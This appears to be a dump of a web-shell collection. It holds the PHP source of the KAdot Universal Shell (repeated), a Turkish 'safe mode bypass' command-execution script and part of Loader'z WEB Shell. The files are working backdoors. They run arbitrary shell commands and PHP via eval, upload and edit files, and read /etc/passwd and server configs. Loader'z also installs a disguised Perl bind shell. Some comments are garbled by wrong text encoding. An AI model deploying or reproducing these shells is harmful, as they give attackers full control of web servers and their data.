+<tr>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (isset($_POST['ephp'])){
+eval($_POST['ephp']);
+}
+break;
+
+
+//Text tools
+case "tools":
+
+echo <<<HTML
+<b>Tools</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="tools">
+<tr>
+<td>
+<input type="radio" name="tac" value="1">B64 Decode<br>
+<input type="radio" name="tac" value="2">B64 Encode<br><hr>
+<input type="radio" name="tac" value="3">md5 Hash
+</td>
+<td><textarea name="tot" rows="5" cols="42"></textarea></td>
+</tr>
+<tr>
+<td> </td>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
+
+switch($_POST['tac']) {
+
+case "1":
+echo "Ðàñêîäèðîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
+break;
+
+case "2":
+echo "Êîäèðîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
+break;
+
+case "3":
+echo "Êîäèðîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
+break;
+}}
+break;
+
+
+// Uploading
+case "upload":
+
+echo <<<HTML
+<b>File Upload</b>
+<table>
+<form enctype="multipart/form-data" action="$self" method="POST">
+<input type="hidden" name="ac" value="upload">
+<tr>
+<td>Ôàéëî:</td>
+<td><input size="48" name="file" type="file"></td>
+</tr>
+<tr>
+<td>Ïàïêà:</td>
+<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
+$tend
+HTML;
+
+if (isset($_POST['path'])){
+
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "Ôàéëî óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n";
+    echo "Èìÿ:" .$_FILES['file']['name']. "\n";
+    echo "Ðàçìåð:" .$_FILES['file']['size']. "\n";
+
+} else {
+    print "Íå óäà¸òñÿ çàãðóçèòü ôàéëî. Èíôà:\n";
+    print_r($_FILES);
+}
+}
+break;
+
+
+// Whois
+case "whois":
+echo <<<HTML
+<b>Whois</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="whois">
+<tr>
+<td>Äîìåí:</td>
+<td><input size="40" type="text" name="wq"></td>
+</tr>
+<tr>
+<td>Õóéç ñåðâåð:</td>
+<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
+</tr>
+<tr><td>
+<input align="right" type="submit" value="Enter">
+</td></tr>
+$tend
+HTML;
+
+if (isset($_POST['wq']) && $_POST['wq']<>"") {
+
+if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
+
+$querty = $_POST['wq']."\r\n";
+$fp = fsockopen($wser, 43);
+
+if (!$fp) {echo "Íå ìîãó îòêðûòü ñîêåò";} else {
+fputs($fp, $querty);
+while(!feof($fp)){echo fgets($fp, 4000);}
+fclose($fp);
+}}
+break;
+
+
+}
+?>
+</pre>
+</body>
+</html>

php/KAdot Universal Shell v0.1.6.php

@@ -0,0 +1,229 @@
+<!--
+
+/+--------------------------------+\
+ |            KA_uShell           |
+ |    <KAdot Universal Shell>     |
+ |         Version 0.1.6          |
+ |            13.03.04            |
+ |  Author: KAdot <KAdot@ngs.ru>  |
+ |--------------------------------|
+\+                                +/
+
+-->
+<html>
+<head>
+<title>KA_uShell 0.1.6</title>
+<style type="text/css">
+<!--
+body, table{font-family:Verdana; font-size:12px;}
+table {background-color:#EAEAEA; border-width:0px;}
+b {font-family:Arial; font-size:15px;}
+a{text-decoration:none;}
+-->
+</style>
+</head>
+<body>
+
+<?php
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$sern = $_SERVER['SERVER_NAME'];
+$tend = "</tr></form></table><br><br><br><br>";
+
+// Configuration
+$login = "admin";
+$pass = "123";
+
+
+/*/ Authentication
+if (!isset($_SERVER['PHP_AUTH_USER'])) {
+header('WWW-Authenticate: Basic realm="KA_uShell"');
+header('HTTP/1.0 401 Unauthorized');
+exit;}
+
+else {
+if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
+{ echo "×òî íàäî?"; exit;}
+}
+*/
+
+
+
+if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
+elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
+else {$ac = "shell";}
+
+// Menu
+echo "
+|<a href=$self?ac=shell>Shell</a>|
+|<a href=$self?ac=upload>File Upload</a>|
+|<a href=$self?ac=tools>Tools</a>|
+|<a href=$self?ac=eval>PHP Eval Code</a>|
+|<a href=$self?ac=whois>Whois</a>|
+<br><br><br><pre>";
+
+
+switch($ac) {
+
+// Shell
+case "shell":
+
+echo <<<HTML
+<b>Shell</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="shell">
+<tr><td>
+$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
+</td></tr>
+<tr><td>
+<textarea cols="100" rows="25">
+HTML;
+
+if (!empty($_POST['c'])){
+passthru($_POST['c']);
+}
+echo "</textarea></td>$tend";
+break;
+
+
+//PHP Eval Code execution
+case "eval":
+
+echo <<<HTML
+<b>PHP Eval Code</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="eval">
+<tr>
+<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (isset($_POST['ephp'])){
+eval($_POST['ephp']);
+}
+break;
+
+
+//Text tools
+case "tools":
+
+echo <<<HTML
+<b>Tools</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="tools">
+<tr>
+<td>
+<input type="radio" name="tac" value="1">B64 Decode<br>
+<input type="radio" name="tac" value="2">B64 Encode<br><hr>
+<input type="radio" name="tac" value="3">md5 Hash
+</td>
+<td><textarea name="tot" rows="5" cols="42"></textarea></td>
+</tr>
+<tr>
+<td> </td>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
+
+switch($_POST['tac']) {
+
+case "1":
+echo "Ðàñêîäèðîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
+break;
+
+case "2":
+echo "Êîäèðîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
+break;
+
+case "3":
+echo "Êîäèðîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
+break;
+}}
+break;
+
+
+// Uploading
+case "upload":
+
+echo <<<HTML
+<b>File Upload</b>
+<table>
+<form enctype="multipart/form-data" action="$self" method="POST">
+<input type="hidden" name="ac" value="upload">
+<tr>
+<td>Ôàéëî:</td>
+<td><input size="48" name="file" type="file"></td>
+</tr>
+<tr>
+<td>Ïàïêà:</td>
+<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
+$tend
+HTML;
+
+if (isset($_POST['path'])){
+
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "Ôàéëî óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n";
+    echo "Èìÿ:" .$_FILES['file']['name']. "\n";
+    echo "Ðàçìåð:" .$_FILES['file']['size']. "\n";
+
+} else {
+    print "Íå óäà¸òñÿ çàãðóçèòü ôàéëî. Èíôà:\n";
+    print_r($_FILES);
+}
+}
+break;
+
+
+// Whois
+case "whois":
+echo <<<HTML
+<b>Whois</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="whois">
+<tr>
+<td>Äîìåí:</td>
+<td><input size="40" type="text" name="wq"></td>
+</tr>
+<tr>
+<td>Õóéç ñåðâåð:</td>
+<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
+</tr>
+<tr><td>
+<input align="right" type="submit" value="Enter">
+</td></tr>
+$tend
+HTML;
+
+if (isset($_POST['wq']) && $_POST['wq']<>"") {
+
+if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
+
+$querty = $_POST['wq']."\r\n";
+$fp = fsockopen($wser, 43);
+
+if (!$fp) {echo "Íå ìîãó îòêðûòü ñîêåò";} else {
+fputs($fp, $querty);
+while(!feof($fp)){echo fgets($fp, 4000);}
+fclose($fp);
+}}
+break;
+
+
+}
+?>
+</pre>
+</body>
+</html>

php/KAdot_Universal_Shell_v0.1.6.php

@@ -0,0 +1,230 @@
+
+<!--
+
+/+--------------------------------+\
+ |            KA_uShell           |
+ |    <KAdot Universal Shell>     |
+ |         Version 0.1.6          |
+ |            13.03.04            |
+ |  Author: KAdot <KAdot@ngs.ru>  |
+ |--------------------------------|
+\+                                +/
+
+-->
+<html>
+<head>
+<title>KA_uShell 0.1.6</title>
+<style type="text/css">
+<!--
+body, table{font-family:Verdana; font-size:12px;}
+table {background-color:#EAEAEA; border-width:0px;}
+b {font-family:Arial; font-size:15px;}
+a{text-decoration:none;}
+-->
+</style>
+</head>
+<body>
+
+<?php
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$sern = $_SERVER['SERVER_NAME'];
+$tend = "</tr></form></table><br><br><br><br>";
+
+// Configuration
+$login = "admin";
+$pass = "123";
+
+
+/*/ Authentication
+if (!isset($_SERVER['PHP_AUTH_USER'])) {
+header('WWW-Authenticate: Basic realm="KA_uShell"');
+header('HTTP/1.0 401 Unauthorized');
+exit;}
+
+else {
+if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
+{ echo "×òî íàäî?"; exit;}
+}
+*/
+
+
+
+if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
+elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
+else {$ac = "shell";}
+
+// Menu
+echo "
+|<a href=$self?ac=shell>Shell</a>|
+|<a href=$self?ac=upload>File Upload</a>|
+|<a href=$self?ac=tools>Tools</a>|
+|<a href=$self?ac=eval>PHP Eval Code</a>|
+|<a href=$self?ac=whois>Whois</a>|
+<br><br><br><pre>";
+
+
+switch($ac) {
+
+// Shell
+case "shell":
+
+echo <<<HTML
+<b>Shell</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="shell">
+<tr><td>
+$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
+</td></tr>
+<tr><td>
+<textarea cols="100" rows="25">
+HTML;
+
+if (!empty($_POST['c'])){
+passthru($_POST['c']);
+}
+echo "</textarea></td>$tend";
+break;
+
+
+//PHP Eval Code execution
+case "eval":
+
+echo <<<HTML
+<b>PHP Eval Code</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="eval">
+<tr>
+<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (isset($_POST['ephp'])){
+eval($_POST['ephp']);
+}
+break;
+
+
+//Text tools
+case "tools":
+
+echo <<<HTML
+<b>Tools</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="tools">
+<tr>
+<td>
+<input type="radio" name="tac" value="1">B64 Decode<br>
+<input type="radio" name="tac" value="2">B64 Encode<br><hr>
+<input type="radio" name="tac" value="3">md5 Hash
+</td>
+<td><textarea name="tot" rows="5" cols="42"></textarea></td>
+</tr>
+<tr>
+<td> </td>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
+
+switch($_POST['tac']) {
+
+case "1":
+echo "Ðàñêîäèðîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
+break;
+
+case "2":
+echo "Êîäèðîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
+break;
+
+case "3":
+echo "Êîäèðîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
+break;
+}}
+break;
+
+
+// Uploading
+case "upload":
+
+echo <<<HTML
+<b>File Upload</b>
+<table>
+<form enctype="multipart/form-data" action="$self" method="POST">
+<input type="hidden" name="ac" value="upload">
+<tr>
+<td>Ôàéëî:</td>
+<td><input size="48" name="file" type="file"></td>
+</tr>
+<tr>
+<td>Ïàïêà:</td>
+<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
+$tend
+HTML;
+
+if (isset($_POST['path'])){
+
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "Ôàéëî óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n";
+    echo "Èìÿ:" .$_FILES['file']['name']. "\n";
+    echo "Ðàçìåð:" .$_FILES['file']['size']. "\n";
+
+} else {
+    print "Íå óäà¸òñÿ çàãðóçèòü ôàéëî. Èíôà:\n";
+    print_r($_FILES);
+}
+}
+break;
+
+
+// Whois
+case "whois":
+echo <<<HTML
+<b>Whois</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="whois">
+<tr>
+<td>Äîìåí:</td>
+<td><input size="40" type="text" name="wq"></td>
+</tr>
+<tr>
+<td>Õóéç ñåðâåð:</td>
+<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
+</tr>
+<tr><td>
+<input align="right" type="submit" value="Enter">
+</td></tr>
+$tend
+HTML;
+
+if (isset($_POST['wq']) && $_POST['wq']<>"") {
+
+if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
+
+$querty = $_POST['wq']."\r\n";
+$fp = fsockopen($wser, 43);
+
+if (!$fp) {echo "Íå ìîãó îòêðûòü ñîêåò";} else {
+fputs($fp, $querty);
+while(!feof($fp)){echo fgets($fp, 4000);}
+fclose($fp);
+}}
+break;
+
+
+}
+?>
+</pre>
+</body>
+</html>

php/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php

@@ -0,0 +1,34 @@
+<?
+echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit</font></b><br>";
+print_r('
+<pre>
+<form method="POST" action="">
+<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="Çalýþtýr" type="submit">
+</form>
+<form method="POST" action="">
+<b><font color=blue>Hýzlý Menü :=) :</font><select size="1" name="liz0">
+<option value="cat /etc/passwd">/etc/passwd</option>
+<option value="netstat -an | grep -i listen">Tüm Açýk Portalarý Gör</option>
+<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
+<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
+<option value="cat /etc/hosts">/etc/hosts</option>
+<option value="cat /etc/named.conf">/etc/named.conf</option>
+<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
+</select> <input type="submit" value="Göster Bakim">
+</form>
+</pre>
+');
+ini_restore("safe_mode");
+ini_restore("open_basedir");
+$liz0=shell_exec($_POST[baba]); 
+$liz0zim=shell_exec($_POST[liz0]); 
+$uid=shell_exec('id');
+$server=shell_exec('uname -a');
+echo "<pre><h4>";
+echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
+echo "<b><font color=red>Server</font></b>:$server<br>";
+echo "<b><font color=red>Komut Sonuçlarý:</font></b><br>"; 
+echo $liz0;
+echo $liz0zim;
+echo "</h4></pre>";
+?>

php/Loaderz WEB Shell.php

@@ -0,0 +1,513 @@
+<?
+error_reporting(0);
+/* Loader'z WEB Shell v 0.1.0.2 {15 àâãóñòà 2005}
+Âîò êàêèå îí ïîääåðæèâàåò ôóíêöèè.
+- Ðàáîòà ñ ôàéëîâîé ñèñòåìîé ñ ïîìîùüþ PHP.  óäîáíîé òàáëèöå ïðåäñòàâëåíî ñîäåðæèìîå òåêóùåé ïàêè (äîáàâëåíèå â ýòîé âåðñèè, íîðìàëüíûé âèä ïðàâ, à íå ÷èñëî :)).
+- Âûïîëíåíèå êîäà, ïõï ðóëèò ;)
+- Ðàáîòàåò ïðè register_globals=off
+- Áîëåå ïðèÿòíàÿ ðàáîòà â ñåéô ìîäå
+- Ïðîñìîòð è ðåäàêòèðîâàíèå ôàéëîâ.
+- Çàêà÷êà ôàéëîâ ñ äðóãîãî ñåðâåðà ñ ïîìîùüþ ñðåäñòâ PHP.
+- Çàêà÷êà ôàéëîâ ñ âàøåãî æåñòêîãî äèñêà.
+- Âûïîëíåíèå ïðîèçâîëüíûõ êîìàíä íà ñåðâåðå.
+- Ñêðèïò âûäàåò çíà÷åíèå íåêîòîðûõ ïåðåìåííûõ. Íàïðèìåð îí ñîîáùèò âêëþ÷åí ëè ñåéô ìîä, åñëè äà, òî ñêðèïò âûâåäåò äèðåêòîðèþ êîòîðàÿ,
+âàì äîñòóïíà, à òàê æå ïóòü, ãäå âû ìîæåòå âûïîëíÿòü êîìàíäû.
+- Ðàáîòà ñêðèïòà îñíîâàíà íà îïðåäåëåíèè òèïà ñåðâåðà.
+- Åñëè ñêðèïò ðàáîòàåò ïîä óïðàâëåíèåì ÎÑ Windows, äàííûå ïîëó÷àåìûå ïðè âûïîëíåíèè êîìàíä ïåðåêîäèðóþòñÿ â win-1251.
+- Ïðèñóòñòâóåò ïðîñòåíüêèé ñêðèïò ïåðë-áèíä. Âû ìîæåòå óêàçàòü äîìàøíþþ äèðåêòðèþ è ïîðò íà êîòîðîì ïîâåñèòñÿ áåêäîð.
+Loader Pro-Hack.ru
+*/
+?>
+
+<style type='text/css'>
+html { overflow-x: auto }
+BODY { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; margin: 0px; padding: 0px; text-align: center; color: #c0c0c0; background-color: #000000 }
+TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: #c0c0c0; background-color: #0000000 }
+BODY,TD {FONT-SIZE: 13px; FONT-FAMILY: verdana, arial, helvetica;}
+A:link {COLOR: #666666; TEXT-DECORATION: none}
+A:active {	COLOR: #666666; TEXT-DECORATION: none;}
+A:visited {COLOR: #666666; TEXT-DECORATION: none;}
+A:hover {COLOR: #999999; TEXT-DECORATION: none;}
+BODY {
+	SCROLLBAR-FACE-COLOR: #cccccc;
+	SCROLLBAR-HIGHLIGHT-COLOR: #CBAB78;
+	SCROLLBAR-SHADOW-COLOR: #CBAB78;
+	SCROLLBAR-3DLIGHT-COLOR: #CBAB78;
+	SCROLLBAR-ARROW-COLOR: #000000;
+	SCROLLBAR-TRACK-COLOR: #000000;
+	SCROLLBAR-DARKSHADOW-COLOR: #CBAB78}
+
+
+
+
+fieldset.search { padding: 6px; line-height: 150% }
+
+label { cursor: pointer }
+
+form { display: inline }
+
+img { vertical-align: middle; border: 0px }
+
+img.attach { padding: 2px; border: 2px outset #000033 }
+
+#tb { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
+#logostrip { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
+#content { padding: 10px; margin: 10px; background-color: #000000; border: 1px solid #CBAB78; }
+#logo { FONT-SIZE: 50px; }
+input { width: 80; height : 17; background-color : #cccccc;
+ 	border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
+#input2 { width: 150; height : 17; background-color : #cccccc;
+ 	border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
+
+
+</style>
+
+<script>
+function tag(thetag) {document.fe.editfile.value=thetag;}
+</script>
+
+
+<title>Loader'z WEB shell</title>
+
+<table height=100% "width="100%">
+<tr><td align="center" valign="top">
+
+
+<table><tr><td>
+<?php
+
+@$dir = $_POST['dir'];
+$dir = stripslashes($dir);
+
+@$cmd = $_POST['cmd'];
+$cmd = stripslashes($cmd);
+$REQUEST_URI = $_SERVER['REQUEST_URI'];
+$dires = '';
+$files = '';
+
+
+
+
+if (isset($_POST['port'])){
+$bind = "
+#!/usr/bin/perl
+
+\$port = {$_POST['port']};
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+	accept(X, S);
+	unless(fork)
+	{
+		open STDIN, \"<&X\";
+		open STDOUT, \">&X\";
+		open STDERR, \">&X\";
+		close X;
+		exec(\"/bin/sh\");
+	}
+	close X;
+}
+";}
+
+function decode($buffer){
+
+return  convert_cyr_string ($buffer, 'd', 'w');
+
+}
+
+
+
+function execute($com)
+{
+
+ if (!empty($com))
+ {
+  if(function_exists('exec'))
+   {
+    exec($com,$arr);
+   echo implode('
+',$arr);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    echo shell_exec($com);
+    
+    
+   }
+  elseif(function_exists('system'))
+{
+
+    echo system($com);
+}
+  elseif(function_exists('passthru'))
+   {
+
+    echo passthru($com);
+
+   }
+}
+
+}
+
+
+function perms($mode)
+{
+
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+
+
+
+/*Íà÷èíàåòñÿ*/
+
+/*Îïðåäåëÿåì òèï ñèñòåìû*/
+$servsoft = $_SERVER['SERVER_SOFTWARE'];
+
+if (ereg("Win32", $servsoft, $reg)){
+$sertype = "winda";
+}
+else
+{
+$sertype = "other";}
+
+
+
+echo $servsoft . "<br>";
+chdir($dir);
+echo "Total space " . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb " . "Free space " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb <br>";
+
+
+
+
+
+if (ini_get('safe_mode') <> 1){
+if ($sertype == "winda"){
+
+ob_start('decode');
+echo "OS: ";
+echo execute("ver") . "<br>";
+ob_end_flush();
+}
+
+if ($sertype == "other"){
+echo "id:";
+
+echo execute("id") . "<br>";
+echo "uname:" . execute('uname -a') . "<br>";
+}}
+else{
+if ($sertype == "winda"){
+
+echo "OS: " . php_uname() . "<br>";
+
+}
+
+if ($sertype == "other"){
+echo "id:";
+
+echo execute("id") . "<br>";
+echo "OS:" . php_uname() . "<br>";
+}
+}
+
+echo 'User: ' .get_current_user() . '<br>';
+
+
+
+if (ini_get("open_basedir")){
+echo "open_basedir: " . ini_get("open_basedir");}
+
+
+if (ini_get('safe_mode') == 1){
+echo "<font size=\"3\"color=\"#cc0000\">Safe mode :(";
+
+if (ini_get('safe_mode_include_dir')){
+echo "Including from here: " . ini_get('safe_mode_include_dir'); }
+if (ini_get('safe_mode_exec_dir')){
+echo " Exec here: " . ini_get('safe_mode_exec_dir');
+}
+echo "</font>";}
+
+
+
+
+if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
+{
+copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
+}
+
+if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
+
+{
+$data = implode("", file($_POST['filefrom']));
+$fp = fopen($_POST['fileto'], "wb");
+fputs($fp, $data);
+$ok = fclose($fp);
+if($ok)
+{
+$size = filesize($_POST['fileto'])/1024;
+$sizef = sprintf("%.2f", $size);
+print "<center><div id=logostrip>Download - OK. (".$sizef."êÁ)</div></center>";
+}
+else
+{
+print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
+}
+}
+
+if (isset($_POST['installbind'])){
+
+if (is_dir($_POST['installpath']) == true){
+chdir($_POST['installpath']);
+$_POST['installpath'] = "temp.pl";}
+
+
+$fp = fopen($_POST['installpath'], "w");
+fwrite($fp, $bind);
+fclose($fp);
+
+exec("perl " . $_POST['installpath']);
+chdir($dir);
+
+
+}
+
+
+@$ef = stripslashes($_POST['editfile']);
+if ($ef){
+$fp = fopen($ef, "r");
+$filearr = file($ef);
+
+
+
+$string = '';
+$content = '';
+foreach ($filearr as $string){
+$string = str_replace("<" , "&lt;" , $string);
+$string = str_replace(">" , "&gt;" , $string);
+$content = $content . $string;
+}
+
+echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
+<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
+<input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
+fclose($fp);
+}
+
+if(isset($_POST['savefile'])){
+
+$fp = fopen($_POST['savefile'], "w");
+$content = stripslashes($content);
+fwrite($fp, $content);
+fclose($fp);
+echo "<center><div id=logostrip>Successfully saved!</div></center>";
+
+}
+
+
+if (isset($_POST['php'])){
+
+echo "<center><div id=logostrip>PHP code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
+<input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
+}
+
+
+
+if(isset($_POST['phpcode'])){
+
+echo "<center><div id=logostrip>Results of PHP execution<br><br>";
+@eval(stripslashes($_POST['phpcode']));
+echo "</div></center>";
+
+
+}
+
+
+if ($cmd){
+
+if($sertype == "winda"){
+ob_start();
+execute($cmd);
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+else{
+ob_start();
+echo decode(execute($cmd));
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+
+if (trim($buffer)){
+echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
+echo decode($buffer);
+echo "</textarea></center></div>";
+}
+
+}
+$arr = array();
+
+$arr = array_merge($arr, glob("*"));
+$arr = array_merge($arr, glob(".*"));
+$arr = array_merge($arr, glob("*.*"));
+$arr = array_unique($arr);
+sort($arr);
+echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
+
+foreach ($arr as $filename) {
+
+if ($filename != "." and $filename != ".."){
+
+if (is_dir($filename) == true){
+$directory = "";
+$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+
+}
+
+if (is_readable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+}
+$dires = $dires . $directory;
+}
+
+if (is_file($filename) == true){
+$file = "";
+$file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$file = $file . "<td>Yes</td>";}
+else{
+$file = $file . "<td>No</td>";
+}
+
+if (is_readable($filename) == true){
+$file = $file . "<td>Yes</td></td></tr>";}
+else{
+$file = $file . "<td>No</td></td></tr>";
+}
+$files = $files . $file;
+}
+
+
+
+}
+
+
+
+}
+echo $dires;
+echo $files;
+echo "</table><br>";
+
+
+
+
+echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+<table id=tb><tr><td>Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
+
+
+<table id=tb><tr><td>Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
+
+echo getcwd();
+echo "\">
+<INPUT type=\"submit\" value=\"Do it\" id=input></td></tr></table></form>";
+
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
